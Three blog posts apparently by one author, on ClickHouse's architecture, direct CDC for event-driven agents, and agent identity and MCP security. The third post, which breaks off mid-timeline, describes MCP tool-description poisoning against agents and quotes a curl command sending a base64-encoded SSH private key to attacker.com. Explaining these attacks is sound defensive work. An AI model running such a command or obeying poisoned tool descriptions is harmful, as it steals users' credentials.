DEV Community: Anil Kurmi

Why We Didn't Converge: ClickHouse's VLDB Paper and the Architecture Agents Actually Need

Anil Kurmi — Sun, 19 Apr 2026 08:28:56 +0000

The moment ClickHouse writes CPU code for your query

You run SELECT category, COUNT(*) FROM events GROUP BY category against 100 million rows. On most databases, the engine walks a bytecode interpreter row by row, dispatching through a switch statement for every tuple. ClickHouse does something else. It takes your specific aggregation, hands it to LLVM, and generates native x86-64 instructions for this exact query. Then it runs them.

The difference is 2 seconds versus 12 seconds. Same hardware, same data, same SQL. Six times faster, because the CPU is executing code written for this GROUP BY, not code written to handle any possible GROUP BY.

The ClickHouse team published their first VLDB paper on April 14, 2026, titled "Lightning Fast Analytics for Everyone." Buried in section 4 is a detail that reframes a decade of analytical-database design: JIT compilation for aggregations was in the first commit in 2016. Not added later as an optimization. Not a recent flex. It was there on day one, because the founders believed interpreters were the bottleneck and compilers were the fix.

This post is about what that paper reveals, why Snowflake and Databricks quietly walked away from true HTAP, why AI agents are spawning 500+ database branches in Lakebase, and how I'd actually design a data platform in 2026.

The 5-minute skim

What the VLDB paper reveals: ClickHouse is not just "fast Postgres." It is four decisions stacked: LSM-style MergeTree storage, vectorized execution on batches (not rows), LLVM JIT for GROUP BY and multi-key sort, and 90+ file format integrations. Remove any one and the performance story collapses.

Default recommendation: If you are building analytics today and already have an OLTP system, do not converge. Split. Send CDC from Postgres into ClickHouse. This is what Snowflake + Databricks + CockroachDB have all effectively endorsed by abandoning HTAP.

Where this breaks: Sub-second freshness with strict transactional consistency across OLTP and OLAP. If an AI agent needs to read an uncommitted order from the last 50 milliseconds and aggregate it against 3 years of history in the same query, composable struggles. That is where Oracle Unified Memory Core, TiDB HTAP+vector, and Databricks Lakebase are betting.

Key trade-off: Composable wins on cost, flexibility, and scale. Converged wins on latency and developer experience for agent workloads. Pick based on whether your consumers are humans or agents.

Why is this the week to talk about data architecture?

Four things landed within seven days and they tell one story.

April 14 — ClickHouse VLDB paper. The first peer-reviewed publication of the internals. Not a blog post. A 12-page VLDB paper with benchmarks, design rationale, and the admission that most of what makes ClickHouse fast was decided in 2016.

April 7 — ClickHouse 26.3 release. 27 features, 40 performance optimizations. Async inserts are now the default. JOIN reordering extended to ANTI, SEMI, and FULL joins. Sharded Map Storage gives 2-49x lookup speedup. Materialized CTEs are real. And WebAssembly UDFs via Wasmtime, which means you can write user-defined functions in Rust or Go and ship them as Wasm.

April 2026 — Databricks Lakebase GA follow-up. Lakebase hit GA in February 2026. By April, the blog post that matters is the one about database branching. AI coding agents are creating 4x more databases than humans. Average production branch depth is 10. Some teams run 500+. Every pull request gets its own isolated Postgres instance with copy-on-write storage.

April 2026 — "Data Lakehouse Architecture 2026." The Medium piece that crystallized the hot/warm/cold pattern. RisingWave materialized views for millisecond freshness, Iceberg for 30-60 second warm tier, Iceberg for cold historical. Kafka topics and Iceberg tables are converging into the same object via StreamNative's Lakestream.

The through-line: the industry stopped pretending one database does everything, and started designing for the fact that agents, not humans, are now the dominant query generator.

What are the four pillars of ClickHouse?

The VLDB paper is organized around four layers. I will keep each brief because the depth is in the paper itself.

1. LSM-style MergeTree storage. Data lands as immutable sorted parts. Background merges compact them. Primary keys are sparse (one entry per 8192 rows by default), which keeps the index in memory even for trillion-row tables. Compression runs column-by-column, so a timestamp column with low cardinality compresses to a few bits per value.

2. Vectorized execution. ClickHouse does not process rows. It processes blocks of 65,536 values at a time. Every operator — filter, aggregate, join — is written to consume and emit these blocks. This means modern CPUs get to use SIMD instructions, branch predictors stay hot, and cache lines do not thrash. It is the difference between calling std::vector::push_back 100 million times and calling memcpy once.

3. JIT compilation via LLVM. This is the trick from the opening. For GROUP BY aggregations and multi-key sorts, ClickHouse emits LLVM IR, compiles it to native code, and caches the result. The payoff scales with aggregation complexity. Simple COUNT(*) sees 2-3x. Multi-column GROUP BY with expressions sees 6-10x. The 2s vs 12s number is from the paper's own benchmark on 100M rows.

4. The integration layer. 90+ file formats. Parquet (with ALP encoding now landing in Arrow 58.2), ORC, Avro, JSON, CSV, native formats from half a dozen other systems. S3, GCS, Azure Blob, HDFS, Kafka, RabbitMQ, Postgres CDC, MySQL CDC. The thesis is that analytics does not live in one system, so the engine must read from everywhere. This is what lets you point ClickHouse at Iceberg tables today and Delta Lake tomorrow without migrating data.

Pull one pillar out and the story breaks. LSM without vectorization gives you a slow log-structured store. Vectorization without JIT gives you Presto. JIT without the integration layer gives you a fast system nobody can feed. The VLDB paper's argument is that all four must coexist.

The agent queries both sides. It hits Postgres for "what is the current state of order 1234" and ClickHouse for "how does this user's behavior compare to the last 90 days of cohort X." One reasoning loop, two stores. That is the composable pattern.

Why did Snowflake and Databricks pivot away from HTAP?

Five years ago the pitch was "one database for everything." Snowflake would handle analytics and operations. Databricks would be the lakehouse that also ran transactions. Both companies quietly walked back that claim.

Snowflake launched Unistore in 2022 and has since de-emphasized it. The Snowflake 2026 narrative is openly about Iceberg interop and letting customers use external engines. They figured out that analytical workloads and transactional workloads want different physical layouts, different consistency models, and different resource profiles. Trying to serve both from one engine means serving both badly.

Databricks shipped Lakebase — and Lakebase is Postgres. Not a columnar engine pretending to be transactional. A real Postgres fork with copy-on-write storage and branching. The Databricks message is now: use the lakehouse for analytics, use Lakebase for OLTP, and let Unity Catalog bridge them. That is composable, not converged.

The pattern that won: Postgres → CDC or ClickPipes → ClickHouse. CockroachDB made this official with their April 2026 ClickHouse webinar, where the recap explicitly endorses the split architecture for agentic AI workloads. The reason is physics. A row-store with MVCC and a column-store with LSM merges cannot share a storage engine without one of them being worse at its job.

What did the fintech learn the hard way?

A fintech I worked with in 2024 tried to skip this lesson. They built what they called a "unified platform" on Postgres — transactions and analytics in the same database, because "we will deal with scale when we get there."

They got there. By early 2024 they were processing billions of events per day. The analytics team wrote a dashboard query that did a seven-way join across orders, users, merchants, and three audit tables. It took 45 seconds. During those 45 seconds, the query held read locks on the orders table. Order processing — the actual revenue-generating path — slowed down. At peak hours, orders were queueing for 200ms, then 800ms, then timing out.

They tried the usual escape hatches. Partitioning orders by date — still row locks. Materialized views — 30-minute refresh intervals, which meant the dashboard showed stale data. Read replicas — replication lag drifted to 2+ hours during heavy analytical queries because the replica was saturated applying WAL.

They split. Postgres stayed the OLTP store. Debezium captured CDC into Kafka. ClickHouse consumed Kafka and materialized the analytical model. Three weeks of engineering.

The numbers after the split:

Analytics query: 45s → 800ms (56x faster)
Order processing P99: back to 40ms
Storage cost: dropped, because ClickHouse compressed 6 months of analytical data into less disk than 2 weeks of raw Postgres tables took. Typical compression ratios were 8-12x for event data with repeated categorical columns.

The lesson: converging OLTP and OLAP in one engine is seductive because it looks simpler. The simplicity is a loan. You pay it back with interest the first time analytics and transactions fight for the same locks.

Is database branching really Git for data?

Databricks Lakebase shipped database branching in February 2026, and by April the usage data is striking. Their own post reports that AI coding agents are creating 4x more databases than human developers. Average team has 10 active branches. Some production setups run 500+ branches deep.

Here is why this matters. When a human opens a PR, they usually test against a shared dev database or a seeded fixture. When an AI agent opens a PR — and agents now open dozens per day per engineer — it needs isolation. Two agents running migrations against the same database will step on each other. So every PR gets its own branch. Copy-on-write means the branch is cheap: it shares pages with the parent until you write, then only the diffs are stored.

This changes the dev workflow in three ways:

CI becomes stateful. Your test database is not reset between runs. It is forked from production (scrubbed), mutated during tests, and discarded. Bugs that only manifest against real data shapes surface earlier.
Migrations get tested for real. You run the migration against a branch that looks like production. If it locks tables for 20 minutes, you see it in CI, not at 3am.
Rollback is instant. A bad deploy? Fork the pre-deploy branch and point the app at it. You do not restore from backup. You switch a pointer.

The 500+ depth number is the one that stopped me. That is an agent spawning branches of branches of branches, each representing a hypothesis it is testing. It is a different shape of computation than humans do, and it is what infra has to support now.

What is the Lakehouse 2026 pattern?

Three tiers, each with a clear job.

Hot tier: RisingWave materialized views. Millisecond freshness. Streaming SQL against Kafka or Pulsar topics. You define a materialized view; it updates incrementally as events land. Query latency is sub-100ms. Use this for dashboards that must be live and for agent loops that react to events in real time.

Warm tier: Iceberg with streaming writes. 30-60 second freshness. This is where Kafka topics and Iceberg tables are merging. StreamNative's Lakestream treats them as one object — you produce to Kafka, you query Iceberg. Equinox, Flink, or RisingWave handle the conversion. This tier is for "recent but not real-time" — last hour of orders, last day of sessions.

Cold tier: Iceberg historical. Partitioned, compacted, cheap. Years of history. Query engines (Trino, Spark, ClickHouse, DuckDB) all read the same Iceberg tables. Storage cost dominates and it is S3-cheap.

The reason Iceberg is eating Delta Lake's lunch for streaming workloads comes down to partition evolution. In Delta, changing a partition scheme requires rewriting metadata. In Iceberg, partition evolution is first-class — you evolve the spec and old data keeps its old partitioning while new data uses the new. For streaming systems where you might shard by minute and then later shard by hour, this is the difference between "we migrate over a weekend" and "we do not migrate at all."

The other Iceberg advantage is multi-engine. Delta is Spark-native — other engines support it, but Spark is the reference. Iceberg was vendor-neutral from day one: AWS, Google, Snowflake, Dremio, and ClickHouse all treat it as a first-class citizen.

Delta still wins on one thing: change data feed. Delta CDF is mature; Iceberg's equivalent (incremental reads) is less battle-tested. If your use case is "give me exactly the changes since version N," Delta is still the safer choice.

How should I think about the trade-offs?

Three live debates, in prose because tables lie about nuance.

Composable versus converged. Composable is Postgres plus ClickHouse plus CDC. Converged is Oracle Unified Memory Core, TiDB HTAP+vector, or Databricks Lakebase. Composable wins on cost (each engine does one job well), on scale (you can shard them independently), and on vendor choice. Converged wins on latency for agent workloads that need to correlate fresh OLTP state with historical OLAP in one query, and on operational simplicity (one system to run, not three). My rule: if your primary consumer is humans writing dashboards, go composable. If it is agents making decisions, evaluate converged — but benchmark first.

ClickHouse versus Snowflake. ClickHouse is open-source, self-hostable, and its cost at petabyte scale is an order of magnitude below Snowflake. Snowflake is managed, has better SLOs out of the box, has deeper integrations with BI tools, and does not require you to run compactions or worry about merge pressure. If you have a small data team and a lot of budget, Snowflake. If you have a strong infra team and a lot of data, ClickHouse.

Iceberg versus Delta Lake. Iceberg wins on partition evolution, multi-engine support, and vendor neutrality. Delta wins on change data feed and Spark-native optimizations. Both are converging — Delta is adding Iceberg compat, Iceberg is improving CDC. If you are starting today with streaming writes, pick Iceberg. If you are deep in the Databricks ecosystem, stay on Delta. Do not try to mix them in one table.

When should I split and when should I converge?

Split (composable) if:

Your analytical queries run longer than 5 seconds on your OLTP store.
You are seeing lock contention between analytics and transactions.
Your storage cost is dominated by analytical data retention.
You have more than one analytical engine in the picture (BI tool + ML training + ad-hoc).
Your dev team is comfortable running CDC and a second data store.

Converge (HTAP-ish) if:

Your agents need sub-100ms correlation between fresh writes and historical aggregates.
Your data volume is low enough that one engine fits.
Your ops team is small and cannot run two stores.
You have strict transactional requirements across analytical reads (rare but real in finance and healthcare).

The honest answer for most teams in 2026 is split. The composable stack is mature. CDC tooling (Debezium, Fivetran, ClickPipes) is boring-reliable. ClickHouse is open-source and fast. Iceberg is vendor-neutral. The convergence story is real but it is still early — Lakebase is GA but young, Oracle Unified Memory Core is new, TiDB's vector integration is evolving.

Five things to take away

ClickHouse is fast because of four decisions, not one. LSM storage, vectorized execution, LLVM JIT, and 90+ integrations. Read the VLDB paper before you build your own.
Do not converge OLTP and OLAP in 2026. Snowflake and Databricks walked away from HTAP for a reason. The fintech war story — 45s to 800ms after splitting — repeats in every company that tries.
Postgres → CDC → ClickHouse is the boring-reliable pattern. Debezium, ClickPipes, or Fivetran for the pipe. ClickHouse for analytics. Postgres for transactions. This works at every scale I have seen.
Database branching changes CI. If your team uses AI coding agents, Lakebase or Neon-style branching is no longer optional. Budget for 10 branches per engineer and plan for depth.
Pick Iceberg over Delta for new streaming workloads. Partition evolution and vendor neutrality are the two features you will need in year three. Delta keeps its edge only if you are all-in on Databricks.

Event-Driven Agents: Why Direct CDC Just Killed the Kafka-Debezium-Kafka Stack

Anil Kurmi — Sun, 19 Apr 2026 08:28:07 +0000

It's 2:47 AM. A fraud detection agent wakes up, polls the transactions REST endpoint, sees nothing unusual, and goes back to sleep for 5 seconds. At 2:47:01, a card is swiped in Berlin. At 2:47:03, a contactless tap lands in London. At 2:47:05, a high-value online purchase clears from a residential proxy in Singapore. The agent's next poll fires at 2:47:06. By then the pattern is already three transactions deep, the money is gone, and the agent sees only the final state: "account balance lower than expected." The fraud chain happened in the gaps between polls.

This is the failure mode that made me stop defending request/response as the default integration style for AI agents this week. The same week Kai Waehner published three back-to-back pieces on agentic AI integration, Apache Flink CDC 3.6.0 shipped with sub-second binlog capture, and DBConvert Streams 2.0 removed Kafka from the CDC path entirely. The 2015-2025 assumption — that change data capture requires a broker — is quietly dying. And when it dies, the architecture under AI agents inverts.

The 5-Minute Skim

What changed this week: Direct CDC shipped in multiple products. Flink CDC 3.6.0 reads MySQL binlog and PostgreSQL WAL directly with sub-second latency and YAML-declarative pipelines. DBConvert Streams 2.0 ships PostgreSQL WAL CDC with zero Kafka in the path. Kai Waehner's trinity piece frames event-driven integration as the connective tissue between process intelligence and agentic AI.

Default recommendation: If you're building an agent that makes more than 5 decisions per second against mutable data, default to a streaming substrate (materialized views + CDC), not REST polling. Use REST for drill-down enrichment, not for primary state.

Where it breaks: Multi-consumer federations with 10+ downstream systems, long-retention event archives, cross-org event sharing — Kafka still wins. Direct CDC is a single-pipeline optimization.

Key trade-off: You're trading Kafka's pluggability and retention for one less hop and one less operational surface. For agent-centric, latency-critical, budget-constrained systems, that's the right trade. For enterprise event backbones, it isn't.

Why this week?

Three signals collided. First, Kai Waehner's "Trinity of Modern Data Architecture" (April 1) argues that agentic AI without event-driven integration is just a chatbot with API access — it can't perceive the world continuously. Second, his "MCP vs REST vs Kafka" piece (April 10) reframes the integration debate: these aren't alternatives, they're layers. Third, his CEP piece (April 14) draws the line between pattern matching (Flink) and inference (agents) — and it turns out most people are using the wrong tool on both sides of that line.

Underneath all three, the plumbing got better. Flink CDC 3.6.0 landed March 30. DBConvert 2.0 landed in April. The "Streaming SQL in 2026" Medium piece declared RisingWave and Materialize production-ready for the materialized-view-as-agent-context pattern. The week you could defend "Kafka in the middle of every pipeline" as the default architecture ended somewhere between these releases.

Why does request/response fail for agents?

Three reasons, each with specifics.

Staleness between polls. A REST endpoint returns a snapshot. If your agent polls every 5 seconds, every decision is made against state that is, on average, 2.5 seconds old. For a chatbot recommending a restaurant, that's fine. For a fraud agent watching a card-present sequence, it's the difference between blocking a transaction and refunding one. The fraud chain above happens entirely inside a single poll interval.

Poll load scales with agents, not with events. If 100 agents each poll every 5 seconds, you generate 20 requests per second against your transactions service — whether or not anything is happening. Most of those requests return "nothing new." This is the worst of both worlds: load when idle, and still latency when busy. Event-driven flips it: zero load when idle, immediate wake-up when an event arrives.

No event history, no pattern detection. A poll gives you the current state. It does not give you the sequence that led to the state. Agents that reason about behavior — fraud chains, user intent, supply chain disruption — need the ordered event stream, not the final snapshot. Request/response discards the sequence by construction.

Kai Waehner's argument in the MCP piece is that these aren't opinions; they're structural properties of the integration style. You can work around them (longer-lived websockets, SSE, webhooks), but at that point you've built a worse Kafka.

Visual architecture: what does the new stack look like?

The pre-2026 stack had three hops between the database and the agent. The 2026 stack has two.

The database is the source of truth. A direct CDC reader tails the write-ahead log. The streaming layer either maintains a materialized view (for query-style access) or runs a CEP pattern (for sequence detection). The agent subscribes to view updates or pattern hits, then uses MCP-exposed tools for drill-down. Kafka is optional, not required.

Kafka vs REST vs MCP: what's the hierarchy?

Here's the frame that clicked for me this week. These three are not competitors. They're layers in a stack, each solving a different problem.

MCP is the tool discovery layer. It tells an agent what it can do — what APIs exist, what schemas they take, what side effects they cause. MCP is static metadata plus an invocation protocol. It does not solve "when should I act."

Kafka (or any event log) is the event sourcing layer. It tells an agent what happened, in order, with replay. This is where continuous perception lives. Without an event log — or a direct-CDC equivalent — an agent is blind between invocations.

CEP / Flink is the pattern match layer. It tells an agent when something interesting just happened — a known sequence, a windowed aggregation, a join across streams. CEP is declarative, deterministic, and fast. It's the scalpel between the firehose and the LLM.

REST is the drill-down layer. It answers agent questions like "what are the last 30 days of charges for this specific account?" once the agent has decided it needs to look. REST is pull-based and stateless, which is exactly what drill-down needs.

The mistake is treating them as alternatives. REST-only agents are blind. Kafka-only agents have no pattern detection. CEP-only pipelines can't reason about ambiguous cases. MCP-only stacks have no perception loop. The production pattern is all four, layered: MCP exposes tools, Kafka (or direct CDC) delivers events, CEP filters for known patterns, the agent handles the ambiguous cases, and REST handles drill-down.

What is the CDC simplification revolution?

Here are the numbers that moved this week.

Traditional Debezium path: database → Debezium connector → Kafka topic → Kafka Connect → downstream processor. Three network hops, three operational surfaces, typical end-to-end latency 100-500ms under load, with tail latencies into seconds during rebalances.

Direct CDC path: database → WAL/binlog reader → processor. One network hop, one operational surface, sub-second end-to-end (often under 200ms), no rebalance tail.

The vendors shipping this pattern now:

RisingWave — PostgreSQL-wire-compatible streaming database. Connects directly to Postgres logical replication or MySQL binlog, maintains materialized views, serves SQL queries. No Kafka required for single-pipeline workloads.
DBConvert Streams 2.0 (April 2026) — PostgreSQL WAL CDC with direct sinks. Explicit positioning as "Kafka-free CDC."
Flink CDC 3.6.0 (March 30, 2026) — sub-second binlog capture, YAML pipeline definitions, direct sinks to Paimon, Iceberg, Doris, StarRocks.
Materialize — incremental view maintenance over Postgres CDC.

The architecture changed from three-hop (DB → Debezium → Kafka → processor) to two-hop (DB → CDC reader → processor). You lose Kafka's multi-consumer fan-out. You gain a simpler operational story and a latency budget that fits agent decision loops.

When does this matter? When the agent's decision latency is dominated by the integration path, not the inference. If your LLM call takes 800ms, shaving 300ms off CDC doesn't help. If your agent uses a small local model and the bottleneck is "how fresh is the state," cutting 300ms of broker hop is a 50% latency reduction.

When does CEP win and when does it fail?

Complex Event Processing is the layer most teams skip and then regret. Kai's CEP piece this week draws clean lines.

CEP wins for known sequences. Fraud chains like the Berlin-London-Singapore one above are textbook CEP: three events, temporal ordering, geographic constraint, cardinality threshold. Flink's MATCH_RECOGNIZE clause expresses this in ten lines of SQL and executes in milliseconds. Asking an LLM to watch a stream for this pattern is a waste of tokens and a latency disaster.

CEP wins for predictive maintenance. "Temperature over 80°C for 3 consecutive readings, followed by vibration spike within 60 seconds" — a Flink pattern, not a prompt. Deterministic, auditable, and cheap.

CEP wins for supply chain and e-commerce behavior. "Cart abandonment after coupon view without checkout within 10 minutes" — pattern match territory.

CEP fails for undefined patterns. If you can't write the pattern in SQL, CEP can't match it. Novel fraud modes, emergent user behaviors, anything that requires "this feels off" judgment — that's agent territory.

CEP fails for simple windowed aggregations. If all you need is "count per minute per user," use a streaming SQL TUMBLE window. CEP is overkill.

CEP fails for multi-day, high-cardinality lookback. CEP holds state per pattern match attempt. Trying to match "any anomaly across 100M users over 30 days" blows up memory. Use a feature store and batch scoring instead.

The pattern that works in production: CEP for known patterns at millisecond latency, agent inference for the ambiguous residual. The CEP layer handles 95% of cases cheaply; the agent handles the 5% that needs reasoning.

Trade-offs: Kafka vs direct CDC, streaming vs polling, CEP vs agent

This is the debate, not a table.

Kafka still wins when you have multi-consumer federations. If ten downstream systems each need the order events — analytics, fraud, CRM, warehouse sync, audit, search indexing, ML features, notifications, billing, reporting — Kafka's fan-out is the right answer. Direct CDC means each consumer opens its own replication slot against the database, which Postgres will not love. Kafka also wins when you need long retention (weeks or months of replayable history), when you need cross-system event archives for compliance, and when your ops team already runs it well. Do not rip out Kafka to save one hop if Kafka is doing five other jobs.

Direct CDC wins when you have a single-pipeline agent-centric architecture. Greenfield project, one primary database, one or two consumers, sub-second latency critical, budget-constrained. The operational surface drops from "Kafka cluster + Connect workers + schema registry + Debezium" to "a reader process." The latency drops by 100-300ms. The monthly bill drops by a meaningful chunk.

Request/response wins for low-frequency, drill-down access. An agent that needs "give me the full profile for user 12345" uses REST via MCP. That's the right tool. Streaming is overkill when the access pattern is ad-hoc and infrequent.

Streaming wins above the 5-decisions-per-second threshold. This is the rough break-even I've seen in practice. Below that, REST polling's overhead is tolerable. Above it, the poll load and staleness start dominating the architecture. At 50 decisions per second, streaming is not optional.

CEP wins when the pattern is known, the latency budget is tight, and the cardinality is high. Fraud rules, SLA breaches, threshold-and-sequence alerts. Declarative, auditable, fast.

Agent inference wins when the pattern is undefined, the reasoning is multi-step, or the flexibility matters more than latency. Novel fraud, customer intent, incident triage. Slower (hundreds of ms to seconds), more expensive per decision, but handles cases CEP can't express.

The production architecture layers both: CEP filters the stream for known patterns, the agent handles the residual.

What are the implementation patterns and anti-patterns?

Pattern: materialized view as agent context. The agent doesn't query the operational database directly. It queries a materialized view in a Postgres-wire-compatible streaming database (RisingWave, Materialize). The view is kept fresh by direct CDC. The agent gets point-in-time consistency and sub-second freshness without loading the primary.

Pattern: CEP filter, agent decider. The Flink job runs the known patterns and emits "suspicious event" signals. The agent subscribes to the suspicious-event topic (or materialized view of suspicious events) and does the deeper reasoning. Cheap filtering, expensive reasoning only where needed.

Pattern: agent feedback loop. The agent's decisions (blocked, approved, escalated) become events themselves, fed back into the stream. Over time, the streaming layer can learn which patterns the agent blocks versus approves, and promote high-confidence patterns back into CEP rules. This is how you migrate decisions from "expensive LLM call" to "cheap pattern match" as you learn.

Anti-pattern: polling for agent context. If you find yourself tuning poll intervals to balance staleness against load, you're solving the wrong problem. Switch substrates.

Anti-pattern: LLM as pattern matcher. Asking GPT-class models to watch a Kafka topic for "sequences of three transactions in different cities" is burning tokens to do what MATCH_RECOGNIZE does in microseconds. Save the LLM for ambiguity.

Anti-pattern: Kafka because Kafka. If you have one producer and one consumer and sub-second requirements, a direct CDC pipeline is simpler and faster. Don't add a broker out of habit.

Anti-pattern: direct CDC at enterprise scale without planning replication slots. Postgres has a hard limit on concurrent replication slots. If twelve teams each want their own slot, you need a fan-out layer — which is exactly what Kafka is for. Know your scale before you rip out the broker.

Actionable takeaways

Audit your agents' integration style this week. Count how many poll REST on a timer. For each, ask: would this agent detect a multi-step sequence that spans the poll interval? If no, flag it for streaming migration.
Pilot direct CDC on one greenfield pipeline. Pick the lowest-risk new agent workload, put RisingWave or Flink CDC 3.6 in the path, skip Kafka. Measure end-to-end latency and compare to your Debezium baseline.
Map your integration stack to the MCP/Kafka/CEP/REST layering. If any layer is missing or doubled-up, that's technical debt. Most teams are missing the CEP layer and double-using REST.
Write three CEP patterns before your next agent project. Fraud sequence, SLA breach, user behavior funnel. If you can express them in Flink SQL, CEP handles them. Everything that doesn't fit becomes agent scope.
Build the feedback loop. Every agent decision should be an event on the stream. Without this, you can't migrate decisions from LLM to CEP as confidence grows, and your agent costs don't come down.

The Agent Identity Crisis — Why OAuth Breaks at Machine Speed

Anil Kurmi — Sun, 19 Apr 2026 08:27:09 +0000

"Only 10% of organizations deploying AI agents have governance in place. Yet 91% are already using them." — RSAC 2026

80 million+ enterprises introduced a new identity-bearing risk surface with zero controls. This is the week the bill came due.

What happened on March 31?

Late on March 31, 2026, a maintainer of Axios — the HTTP client that 150 million+ downstream projects rely on every week — pushed two new versions to npm: axios@1.14.1 and axios@0.30.4. Minutes later, a hidden dependency inside those releases started phoning home to an attacker-controlled endpoint.

The maintainer hadn't been phished. He hadn't reused a password. He had MFA enabled. He had a hardware key. And none of it mattered.

For the previous two weeks, a North Korean group Microsoft Threat Intelligence tracks as UNC1069 had been building an alternate reality around him. A cloned Slack workspace. AI-generated deepfake video calls from a fake colleague. A fake LinkedIn profile that matched a real contact in his graph. On March 29, through that social channel, the maintainer opened something he shouldn't have on his developer machine. UNC1069 harvested a valid, unexpired npm session token from his browser storage and walked straight past MFA.

By April 1, Microsoft had the attribution. By April 3, Microsoft Security Response Center was publishing CVE-2026-32211: a CVSS 9.1 missing-authentication flaw in the Azure MCP Server. By April 15, Cloudflare had rushed Managed OAuth for agent-ready apps into general availability. In between, Ox Security disclosed a systemic flaw in MCP itself, and OWASP released its first-ever Top 10 for Agentic Applications, peer-reviewed by over 100 experts.

Four events. Seventeen days. One through-line: OAuth, as we know it, was never designed for agents. And agents are here.

5-Minute Skim

The convergence. Agent adoption hit 91% of enterprises before governance hit 10%. MCP — the protocol everyone is wiring agents through — has no built-in auth. Azure's reference implementation shipped without auth (CVE-2026-32211). 5.5% of public MCP servers already contain poisoned tool descriptions. A single session-token theft compromised a package with 150M weekly downloads.

Default recommendation. Stop issuing long-lived agent tokens. Migrate agent-to-service calls to RFC 8693 Token Exchange. Bind tokens to the agent's public key via DPoP (RFC 9449). Wire CAEP so revocation propagates in seconds. Treat MCP servers as hostile code.

Where it breaks. OAuth2 assumes a human in the loop, a browser with PKCE, and refresh measured in hours. Agents call each other thousands of times per second, delegate to other agents, and run unattended for days.

Key trade-off. Long-lived tokens (24h-7d) are simpler but create Axios-style blast radius. Short-lived tokens align with CAEP revocation but hammer your IdP. The industry is converging on three tiers: human-initiated actions get 5-60 minute tokens, agent-to-agent hops get milliseconds-to-seconds plus DPoP, and batch jobs get single-purpose scoped credentials.

Why this week?

Three events collided inside a single news cycle, and they're not coincidental — they're the same underlying failure mode surfacing in three places.

April 3 — CVE-2026-32211. Microsoft disclosed that the Azure MCP Server — the reference implementation everyone copy-pastes from — shipped with missing authentication on its management endpoints. CVSS 9.1. An attacker with network reachability could enumerate and invoke registered tools without any credential. This is the auth layer simply not being there.

April 14 — Ox Security's MCP disclosure. Ox published research showing a systemic flaw in MCP's STDIO interface: tool descriptions are injected into the LLM's context, so a malicious description can rewrite the agent's intent. Their scan of public MCP servers found 5.5% already contained poisoned descriptions. With auto-approve enabled, their attack succeeded 84.2% of the time. The ecosystem: 150M+ downloads.

April 15 — Cloudflare Managed OAuth. Cloudflare Access rolled out Managed OAuth for agent-ready apps. The significance isn't the feature — it's the positioning. Cloudflare explicitly framed OAuth2 as insufficient for agentic traffic and shipped a managed layer handling Token Exchange, DPoP binding, and CAEP. When Cloudflare rewrites its own identity story in a week, the industry has moved.

Behind all three: OWASP's Top 10 for Agentic Applications 2026, peer-reviewed by 100+ contributors, lists "Identity & Authentication Failures" and "Tool Poisoning" in the top five. For the first time, AppSec guidelines agree that agent identity is a distinct category.

Why does OAuth break for agents?

OAuth2 was designed in 2012 for a specific world: a human clicks "Allow" in a browser, a web app gets a token, and the token is used to call an API on that human's behalf for the next hour. Every primitive in the spec assumes those constraints.

Agents break every one of them:

No human in the loop. An agent orchestrating at 3 a.m. cannot pop a consent screen. The authorization_code grant is unusable. Teams fall back to client_credentials, which gives the agent its own identity but loses "on behalf of the user" context. Audit trails go dark.

Multi-hop delegation. A planner agent calls a research agent, which calls a code-execution agent, which calls an MCP tool. OAuth has no native model for this. The OBO extension papers over it, but semantics vary across IdPs.

Token lifetimes are wrong at both ends. A 1-hour token is too long for an agent making 10k calls/sec — one leaked token is catastrophic. It's too short for a batch agent running 8 hours; refresh logic leaks into every tool call. OAuth assumes a human-scale cadence that fits neither.

Tokens aren't bound to anything. Bearer tokens mean whoever holds them, owns them. In a browser, that's contained. In an agent mesh where tokens traverse queues, logs, shell subprocesses, and sidecars, bearer semantics are indefensible. UNC1069 proved it: a stolen bearer token bypassed MFA.

Policy enforcement is too slow. Tokens are validated once at issuance. But an agent's context changes mid-task. Without CAEP, the IdP can't say "that token you issued 30 seconds ago? Revoke it now." At human speed, 30 seconds is fine. At agent speed, it's thousands of requests.

No attribute-based scoping. OAuth scopes are coarse strings — read:email, write:files. Agents need context-aware policy: "this agent can read files tagged public from tenant X when invoked by user Y during business hours." That's ABAC, and OAuth has no hook for it.

Taken together, these aren't six small gaps — they're one structural mismatch. OAuth was built for a browser visiting a web app. Agents are neither.

Visual Architecture Model

Here is what agent-native authentication actually has to look like. A human authenticates once; every downstream hop is a token exchange with DPoP binding.

Three properties make this flow agent-native. First, the human authenticates exactly once, with PKCE, in a browser — the one place classic OAuth still works perfectly. Second, every hop after that is an RFC 8693 token exchange, which preserves the chain (subject_token = original user, actor_token = agent in the middle) so audit logs can reconstruct intent. Third, every agent-held token is cryptographically bound to that agent's key via DPoP — theft of the token alone is useless without the private key, which never leaves the agent's enclave.

The MCP supply-chain risk

The MCP (Model Context Protocol) ecosystem is where the agent identity crisis is hottest, because MCP was explicitly designed with auth as an afterthought. Its STDIO transport executes shell commands as tool invocations — which means the tool description the LLM reads and the shell command that runs are separated by nothing but trust.

Ox Security's April 14 disclosure walked through the mechanism. An MCP server registers a tool with a description like "git commit — commits staged changes". The LLM reads that description and invokes the tool. But nothing validates that the underlying shell command matches the description. A malicious server can register a tool described as "list files" and execute curl attacker.com/$(cat ~/.ssh/id_rsa | base64) instead. In agents with auto-approve (which, per OWASP, is the common default), the success rate in Ox's lab was 84.2%.

Their public scan found 5.5% of registered MCP servers already shipping with description/command mismatches — some intentional, some the result of copy-pasted examples from compromised tutorials. The surface area: every organization running GitHub Copilot Agent, Claude Desktop, Cursor, or any of the 150M+ installs across the MCP-aware tool ecosystem.

CVE-2026-32211 is the same disease in Microsoft's reference server: management endpoints with no auth, meaning anyone on the network can register a tool. Tool registration is the supply chain.

The lesson for architects: an MCP server is unverified code from an unknown publisher. Treat it the way you'd treat a browser extension asking for "read all your data on all websites." The answer is not faster review. The answer is isolation — MCP servers run in their own sandbox with their own scoped credentials, and their tool invocations are mediated by a policy engine the agent cannot bypass.

The Axios war story — what OAuth would have prevented

Let me walk the Axios timeline again, this time annotating what a properly-designed agent identity stack would have caught.

Early March. UNC1069 begins open-source recon. They identify the Axios maintainer, map his LinkedIn and GitHub graph, and build personas matching real contacts. OAuth caught nothing — this is social engineering, not credential theft. But a well-tuned ITDR system ingesting LinkedIn telemetry could have flagged the anomalous new connection pattern.

March 15-25. AI-generated deepfake video calls. A Slack workspace cloned pixel-for-pixel. A fake LinkedIn profile with a matching photo. Still no credential event. But note: every one of these attacks used identity signals (Slack tenant, LinkedIn profile, Zoom account) that a unified ITDR platform could correlate.

